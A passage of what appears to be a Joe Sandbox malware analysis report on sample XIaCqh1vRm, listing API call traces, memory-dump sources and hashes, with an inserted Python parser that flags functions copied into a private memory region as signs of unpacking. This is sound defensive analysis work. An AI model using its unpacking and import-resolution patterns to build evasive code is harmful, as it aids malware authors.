                                                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(?,00000000,024BC4A4,00000001,?,00000005,00000000,00000000), ref: 024C3BE8
                                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,00000000,024C425F,00000000,?,?,?,?,?,?,?,?,?,024C425F,0249E03C), ref: 024C3C07
                                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,0249E03C,00000001,024C425F,00000000,?,?,?,?,?,?,?,?,?,024C425F,0249E03C), ref: 024C3C40
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
• API ID: FileWrite__fassign$ByteCharConsoleMultiWide
• String ID:
• API String ID: 1324828854-0
• Opcode ID: 91521d98319a5a2b9b08759a4322e951b3fa054d078199bb11df0d5f795575d8
• Instruction ID: 62546ae6c4c06f584debaa7933d804e032d36d239a92dff931377c6f7ae1bd3e
• Opcode Fuzzy Hash: 91521d98319a5a2b9b08759a4322e951b3fa054d078199bb11df0d5f795575d8
• Instruction Fuzzy Hash: 8451D7759002099FDB10CFA9D884AEEBBF4EF09704F24815FE555E7291E7309681CF65
APIs
• Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 024B4ACD
  • Part of subcall function 024B4D9C: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,024B4800), ref: 024B4DAC
• Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 024B4AE2
• std::invalid_argument::invalid_argument.LIBCONCRT ref: 024B4AF1
• __CxxThrowException@8.LIBVCRUNTIME ref: 024B4AFF
• Concurrency::details::FreeVirtualProcessorRoot::Affinitize.LIBCONCRT ref: 024B4B75
• std::invalid_argument::invalid_argument.LIBCONCRT ref: 024B4BB5
• __CxxThrowException@8.LIBVCRUNTIME ref: 024B4BC3
Memory Dump Source
• Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
Yara matches
Similarity
• API ID: Concurrency::details::$Exception@8FreeProcessorRoot::ThrowVirtualstd::invalid_argument::invalid_argument$AffinitizeExecutionIdleObjectProxy::ResetSingleSuspendThreadWait
• String ID:
• API String ID: 3151764488-0
• Opcode ID: 219df9cbfeb1429f4312672cca97738a090813e365a6f1d89fd3b539392bd973
• Instruction ID: a628bbbd2d348ce29d9d0df7e48769a6e4244e10d226924f0f8b5281cf18a5be
• Opcode Fuzzy Hash: 219df9cbfeb1429f4312672cca97738a090813e365a6f1d89fd3b539392bd973
• Instruction Fuzzy Hash: 8831EA39A002149BCF06EF69C8A1BAE73B9FF45710F20456BD91597342DB70DE01DBA4
Memory Dump Source
• Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 26fd24188a083ade74c1b847c8e385b80c443176beafc5e0d5befa98fb89b42a
• Instruction ID: 860e752c6eb2c716a5d855c3c03ea0c0e6c73714a276bf2c7701abe861d4aafe
• Opcode Fuzzy Hash: 26fd24188a083ade74c1b847c8e385b80c443176beafc5e0d5befa98fb89b42a
• Instruction Fuzzy Hash: 51113A72A00216BFD7206FB7AC04F6B7B6CEF8A735F10123BF815C7240DA3889048669
Memory Dump Source
• Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 32159607c4063c2e90e18d1ced7cd03c6b33762cae1000625b4156809b17c3e4
• Instruction ID: 0712ba03e109f8226f459bfa4cec96e6b59cc2fe8c8c847ce00823193b087448
• Opcode Fuzzy Hash: 32159607c4063c2e90e18d1ced7cd03c6b33762cae1000625b4156809b17c3e4
• Instruction Fuzzy Hash: A511B739704115BBDB612F7ACC489AB7A6EEF82721B21061FFC16D7240DB348845DAB0
APIs
  • Part of subcall function 0043A0CA: _free.LIBCMT ref: 0043A0F3
• _free.LIBCMT ref: 0043A3D1
  • Part of subcall function 0043346A: HeapFree.KERNEL32(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
  • Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492
• _free.LIBCMT ref: 0043A3DC
• _free.LIBCMT ref: 0043A3E7
• _free.LIBCMT ref: 0043A43B
• _free.LIBCMT ref: 0043A446
• _free.LIBCMT ref: 0043A451
• _free.LIBCMT ref: 0043A45C
Memory Dump Source
• Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
• Instruction ID: 8be3f6aa1696d7c36a68609bae5c6e68c8e713719265dd61fa4e844ff8b4370f
• Opcode Fuzzy Hash: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
• Instruction Fuzzy Hash: C611B472581B04A6E531BF72CC0BFCB77AD6F18305F40581EB6DA7B052CA2CB5144B46
APIs
  • Part of subcall function 024CA331: _free.LIBCMT ref: 024CA35A
• _free.LIBCMT ref: 024CA638
  • Part of subcall function 024C36D1: HeapFree.KERNEL32(00000000,00000000,?,024CA35F,?,00000000,?,00000000,?,024CA603,?,00000007,?,?,024CA9F7,?), ref: 024C36E7
  • Part of subcall function 024C36D1: GetLastError.KERNEL32(?,?,024CA35F,?,00000000,?,00000000,?,024CA603,?,00000007,?,?,024CA9F7,?,?), ref: 024C36F9
• _free.LIBCMT ref: 024CA643
• _free.LIBCMT ref: 024CA64E
• _free.LIBCMT ref: 024CA6A2
• _free.LIBCMT ref: 024CA6AD
• _free.LIBCMT ref: 024CA6B8
• _free.LIBCMT ref: 024CA6C3
Memory Dump Source
• Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
Yara matches
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
• Instruction ID: d60e3b10f5a541f1e3c712431f81d847c3e58f04d546d41ca474a2eb30efb138
• Opcode Fuzzy Hash: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
• Instruction Fuzzy Hash: 6B11B4B5605B18AADEB0BF77CC55FCF7B9EDF00700F50482EA299AA160D6A4B4114F40
APIs
• GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,?,0000FFFF,00000000,?,00000000,?,00410B39,?,?,?,00000000), ref: 00412400
• GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00410B39,?,?,?,00000000), ref: 00412406
• GetLogicalProcessorInformation.KERNEL32(00000000,?,?,0000FFFF,00000000,?,00000000,?,00410B39,?,?,?,00000000), ref: 00412433
• GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00410B39,?,?,?,00000000), ref: 0041243D
• GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00410B39,?,?,?,00000000), ref: 0041244F
• Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412465
• __CxxThrowException@8.LIBVCRUNTIME ref: 00412473
Memory Dump Source
• Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 4227777306-0
                                                                                                                                                                                                                                                                          • Opcode ID: a863a92f0c1e6d652057a51708b91d14413968702bc4a7dce5340fefc1acb9cb
                                                                                                                                                                                                                                                                          • Instruction ID: 91daacb073e6275429519e5223cc2729029c874a602b9c25603bfcabc23aa3f5
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a863a92f0c1e6d652057a51708b91d14413968702bc4a7dce5340fefc1acb9cb
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4001F734600121ABC714AF66ED0ABEF3768AF42B56B60042BF905E2161DBACDA54866D
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,?,0000FFFF,00000000,?,00000000,?,024A0DA0,?,?,?,00000000), ref: 024A2667
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,024A0DA0,?,?,?,00000000), ref: 024A266D
                                                                                                                                                                                                                                                                          • GetLogicalProcessorInformation.KERNEL32(00000000,?,?,0000FFFF,00000000,?,00000000,?,024A0DA0,?,?,?,00000000), ref: 024A269A
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,024A0DA0,?,?,?,00000000), ref: 024A26A4
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,024A0DA0,?,?,?,00000000), ref: 024A26B6
                                                                                                                                                                                                                                                                          • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024A26CC
                                                                                                                                                                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 024A26DA
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 4227777306-0
                                                                                                                                                                                                                                                                          • Opcode ID: 6ffd0926a6e81f7b76a1000da81b11bcce1220a1458d59011de0bfb908ca6654
                                                                                                                                                                                                                                                                          • Instruction ID: 0e8d175086ac41bcc4a545e07c95b9ab4c1cc92e552ad1b8c15ade6ff792488d
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6ffd0926a6e81f7b76a1000da81b11bcce1220a1458d59011de0bfb908ca6654
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0A01A735502115A7D720FF6AEC58FAF376CAF52F52B50042BF805D2160EBA4D9449AB8
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000,00000000,?,?,?,024A670B), ref: 024A24B6
                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00446CDC), ref: 024A24C4
                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00446CF4), ref: 024A24D2
                                                                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,00446D0C,?,?,?,024A670B), ref: 024A2500
                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 024A2507
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,024A670B), ref: 024A2522
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,024A670B), ref: 024A252E
                                                                                                                                                                                                                                                                          • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024A2544
                                                                                                                                                                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 024A2552
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: AddressProc$ErrorHandleLastModule$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                                                                                                                                                                                                                                          • String ID: kernel32.dll
                                                                                                                                                                                                                                                                          • API String ID: 4179531150-1793498882
                                                                                                                                                                                                                                                                          • Opcode ID: 44ecf9bd0dd5c91555fe9cdf304f14bfeeea195f7c9b597a93ca8c7b2ae1de14
                                                                                                                                                                                                                                                                          • Instruction ID: 5f1891afa62f468227035c915ee513812fc5e4264239869d0fd027f1f7355b9f
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 44ecf9bd0dd5c91555fe9cdf304f14bfeeea195f7c9b597a93ca8c7b2ae1de14
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9FF0F9759003103FF7117B757D6981B3FACDD5AA23320023BF802E2291EBB5C5019658
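The three records above show the same statically linked Concurrency Runtime initialisation routine (GetLogicalProcessorInformation, GetLastError, then a scheduler_resource_allocation_error throw) once in the image mapped at 00400000 (based on PE: true) and again in the private region at 02490000 (based on PE: false), followed by a GetModuleHandleW("kernel32.dll") / GetProcAddress resolver in that same private region. The script below is an added example, not Joe Sandbox tooling and not part of this report: it parses function records in the layout printed here and groups them by API String ID, so that routines present in both a PE-backed region and a private allocation can be listed mechanically, together with any record that resolves imports at run time. Treating a shared API String ID across regions as a relocated or unpacked copy of the same function is the analyst's inference, not a field the report emits; the regexes assume the field labels exactly as printed on this page, and the sample text is copied from these records with argument lists shortened.

```python
"""Cross-reference Joe Sandbox function records across memory dumps.

Added example, not Joe Sandbox tooling. Groups per-function records by
"API String ID"; an ID seen in both a PE-backed dump and a private region
is reported as a likely relocated copy (analyst inference, not a report field).
"""
import re
from collections import defaultdict

# Constructed input: three records from this page, argument lists shortened
# and most hash lines dropped to keep the sample short.
SAMPLE = """\
APIs
• GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000), ref: 00412400
• GetLastError.KERNEL32(?,0000FFFF,00000000), ref: 00412406
• Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412465
• __CxxThrowException@8.LIBVCRUNTIME ref: 00412473
Memory Dump Source
• Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• String ID:
• API String ID: 4227777306-0
• Opcode ID: a863a92f0c1e6d652057a51708b91d14413968702bc4a7dce5340fefc1acb9cb
APIs
• GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000), ref: 024A2667
• GetLastError.KERNEL32(?,0000FFFF,00000000), ref: 024A266D
• Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024A26CC
• __CxxThrowException@8.LIBVCRUNTIME ref: 024A26DA
Memory Dump Source
• Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Yara matches
Similarity
• API String ID: 4227777306-0
• Opcode ID: 6ffd0926a6e81f7b76a1000da81b11bcce1220a1458d59011de0bfb908ca6654
APIs
• GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000), ref: 024A24B6
• GetProcAddress.KERNEL32(00000000,00446CDC), ref: 024A24C4
• GetLastError.KERNEL32(?,?,?,024A670B), ref: 024A2522
• __CxxThrowException@8.LIBVCRUNTIME ref: 024A2552
Memory Dump Source
• Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Similarity
• String ID: kernel32.dll
• API String ID: 4179531150-1793498882
• Opcode ID: 44ecf9bd0dd5c91555fe9cdf304f14bfeeea195f7c9b597a93ca8c7b2ae1de14
"""

# "• Name.MODULE(" or "• Name.MODULE ref:"; subcall lines carry a prefix.
API_LINE = re.compile(
    r"^\s*•\s*(?P<sub>Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<name>[A-Za-z_][\w:@]*)\.(?P<module>[A-Z0-9]+)\b"
)
SOURCE_LINE = re.compile(
    r"Source File: (?P<file>\S+), Offset: (?P<offset>[0-9A-Fa-f]+), "
    r"based on PE: (?P<pe>true|false)"
)
FIELD_LINE = re.compile(r"^\s*•\s*(?P<key>API String ID|Opcode ID|String ID): ?(?P<val>.*)$")


def parse_records(text):
    """Split report text into one dict per function record (each starts at an 'APIs' header)."""
    records, cur = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            cur = {"apis": [], "subcall_apis": [], "offset": None, "based_on_pe": None,
                   "api_string_id": None, "opcode_id": None, "string_id": ""}
            records.append(cur)
            continue
        if cur is None:
            continue
        m = API_LINE.match(line)
        if m:
            bucket = "subcall_apis" if m.group("sub") else "apis"
            cur[bucket].append(f"{m.group('name')}.{m.group('module')}")
            continue
        m = SOURCE_LINE.search(line)
        if m:
            cur["offset"] = int(m.group("offset"), 16)
            cur["based_on_pe"] = m.group("pe") == "true"
            continue
        m = FIELD_LINE.match(line)
        if m:  # "API String ID" -> api_string_id, etc.
            cur[m.group("key").lower().replace(" ", "_")] = m.group("val").strip()
    return records


def cross_region_functions(records):
    """API String IDs seen at more than one dump offset -> sorted list of (offset, based_on_pe)."""
    by_id = defaultdict(set)
    for r in records:
        if r["api_string_id"] and r["offset"] is not None:
            by_id[r["api_string_id"]].add((r["offset"], r["based_on_pe"]))
    return {k: sorted(v) for k, v in by_id.items() if len({off for off, _ in v}) > 1}


def dynamic_resolvers(records):
    """Records that resolve imports at run time, as (offset, opcode_id, string_id)."""
    wanted = {"GetProcAddress", "LdrGetProcedureAddress"}
    return [(r["offset"], r["opcode_id"], r["string_id"]) for r in records
            if {a.split(".", 1)[0] for a in r["apis"]} & wanted]


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for sid, places in cross_region_functions(recs).items():
        print(sid, [(hex(o), "image" if pe else "private") for o, pe in places])
    for off, opc, s in dynamic_resolvers(recs):
        print(hex(off), opc[:16], s)
```

On the sample, the ConcRT routine is the only API String ID reported at both 0x400000 (image) and 0x2490000 (private), and the kernel32 resolver at 0x2490000 is the only dynamic-resolution record. Running the same parser over a full report gives the complete set of functions duplicated into the private region, which is the material to diff against the on-disk image when confirming the unpacking the report flags.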
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 0040C677
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Exception@8Throw
                                                                                                                                                                                                                                                                          • String ID: F(@$F(@$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                                                                                                                          • API String ID: 2005118841-3619870194
                                                                                                                                                                                                                                                                          • Opcode ID: 4e72df4a54faba6b4a23b621e2ab49bac9e9259a8814ffb1d887fe638a498f77
                                                                                                                                                                                                                                                                          • Instruction ID: df443d8f91edbbbc86da8982951f5297a94925b32ed328c00139598aac834c40
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4e72df4a54faba6b4a23b621e2ab49bac9e9259a8814ffb1d887fe638a498f77
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FAF0FC72900204AAC714D754CC42FAF33545B11305F14867BED42B61C3EA7EA945C79C
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                                                                                                                                                                                                                                            • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                                                                                                                                                                                                                                            • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                                                                                                                                                                                                                                          • _memcmp.LIBVCRUNTIME ref: 0043116C
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 004311DD
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 004311F6
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00431228
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00431231
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0043123D
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: _free$ErrorLast$_memcmp
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 4275183328-0
                                                                                                                                                                                                                                                                          • Opcode ID: d8dc9f9b959f2552d3534fca6110d840858028caececac5b62d3d4aa587a1dd2
                                                                                                                                                                                                                                                                          • Instruction ID: 3f2797ad77f757c3ae12916b07ca9a57840cbe3c0d6446731fa2169183c3460f
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d8dc9f9b959f2552d3534fca6110d840858028caececac5b62d3d4aa587a1dd2
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 57B13975A016199FDB24DF18C884AAEB7B4FF48314F1086EEE909A7360D775AE90CF44
APIs
• MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,?,?,?,?,024C25EC,00000001,00000001,?), ref: 024C23F5
• MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,024C25EC,00000001,00000001,?,?,?,?), ref: 024C247B
• WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 024C2575
• __freea.LIBCMT ref: 024C2582
  • Part of subcall function 024C390E: RtlAllocateHeap.NTDLL(00000000,0249DAD7,00000000), ref: 024C3940
• __freea.LIBCMT ref: 024C258B
• __freea.LIBCMT ref: 024C25B0
Memory Dump Source
• Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
Yara matches
Similarity
• API ID: ByteCharMultiWide__freea$AllocateHeap
• String ID:
• API String ID: 1414292761-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
Yara matches
Similarity
• API ID: __cftoe
• String ID:
• API String ID: 4189289331-0
APIs
• Concurrency::details::SchedulerBase::GetRealizedChore.LIBCONCRT ref: 024B3051
  • Part of subcall function 024A8AB2: RtlInterlockedPopEntrySList.NTDLL(?), ref: 024A8ABD
• SafeSQueue.LIBCONCRT ref: 024B306A
• Concurrency::location::_Assign.LIBCMT ref: 024B312A
• std::invalid_argument::invalid_argument.LIBCONCRT ref: 024B314B
• __CxxThrowException@8.LIBVCRUNTIME ref: 024B3159
Memory Dump Source
• Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
Yara matches
Similarity
• API ID: AssignBase::ChoreConcurrency::details::Concurrency::location::_EntryException@8InterlockedListQueueRealizedSafeSchedulerThrowstd::invalid_argument::invalid_argument
• String ID:
• API String ID: 3496964030-0
APIs
• FindSITargetTypeInstance.LIBVCRUNTIME ref: 024B8F77
• FindMITargetTypeInstance.LIBVCRUNTIME ref: 024B8F90
• FindVITargetTypeInstance.LIBVCRUNTIME ref: 024B8F97
• PMDtoOffset.LIBCMT ref: 024B8FB6
Memory Dump Source
• Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
Yara matches
Similarity
• API ID: FindInstanceTargetType$Offset
• String ID:
• API String ID: 1467055271-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
Yara matches
Similarity
• API ID: Cnd_initstd::_$Cnd_waitMtx_initThrd_start
• String ID:
• API String ID: 1687354797-0
APIs
• GetLastError.KERNEL32(?,?,00428DD1,00426762,004406A0,00000008,00440A05,?,?,?,?,00423A4B,?,?,14DCCF97), ref: 00428DE8
• ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00428DF6
• ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00428E0F
• SetLastError.KERNEL32(00000000,?,00428DD1,00426762,004406A0,00000008,00440A05,?,?,?,?,00423A4B,?,?,14DCCF97), ref: 00428E61
Memory Dump Source
• Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
Similarity
• API ID: ErrorLastValue___vcrt_
• String ID:
• API String ID: 3852720340-0
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,024B9038,024B69C9,024D0907,00000008,024D0C6C,?,?,?,?,024B3CB2,?,?,0045A064), ref: 024B904F
                                                                                                                                                                                                                                                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 024B905D
                                                                                                                                                                                                                                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 024B9076
                                                                                                                                                                                                                                                                          • SetLastError.KERNEL32(00000000,?,024B9038,024B69C9,024D0907,00000008,024D0C6C,?,?,?,?,024B3CB2,?,?,0045A064), ref: 024B90C8
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3852720340-0
                                                                                                                                                                                                                                                                          • Opcode ID: e85c682642ed7c149dd5185dec7a9b8ad0a0b140fbe983a0f7f6208f4934dca6
                                                                                                                                                                                                                                                                          • Instruction ID: 52334fe92522e38c59e5aa06fb3791982173b72628c52414da0830fe3f1b5e94
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e85c682642ed7c149dd5185dec7a9b8ad0a0b140fbe983a0f7f6208f4934dca6
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B601F7326097216EA72B27B5AC88AE72755EF05775B30033FFA20453E1EF1288554DB9
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00404D63
                                                                                                                                                                                                                                                                          • int.LIBCPMT ref: 00404D7A
                                                                                                                                                                                                                                                                            • Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
